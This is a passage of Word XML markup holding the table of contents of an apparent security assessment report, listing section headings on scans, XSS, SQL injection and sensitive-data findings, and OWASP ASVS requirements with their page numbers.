          <w:t>Security Architecture Review</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402717 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6718E5CD"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18" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.2</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web Server Security Scan</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402718 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4134CA5B"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19" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.3</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Dynamic Vulnerability Scan</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402719 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2143D994"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20" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Source Code Scan</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402720 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42FED869"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21" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.5</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Out of Scope Items</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402721 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45C0FF39" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="400"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402722" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Assessment/Verification Results</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402722 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="180C07B3"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23" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Summary of Test Results</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402723 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20901746" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402724" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1.1</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Cross-Site Scripting (XSS) Findings</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402724 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52D9A994" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402725" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1.2</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Sensitive Data Exposure Findings</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402725 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="034B61BE" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402726" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1.3</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>SQL Injections Findings</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402726 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DF17ABB" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402727" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1.4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Components With Known Vulnerabilities Findings</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402727 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33FE476E"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28" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.2</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Source Code Findings</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402728 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D071C4E"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29" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.3</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>OWASP ASVS Level 1A Verification Requirements</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402729 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54D5B1E7"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30" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>OWASP ASVS Level 1B Verification Requirements</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
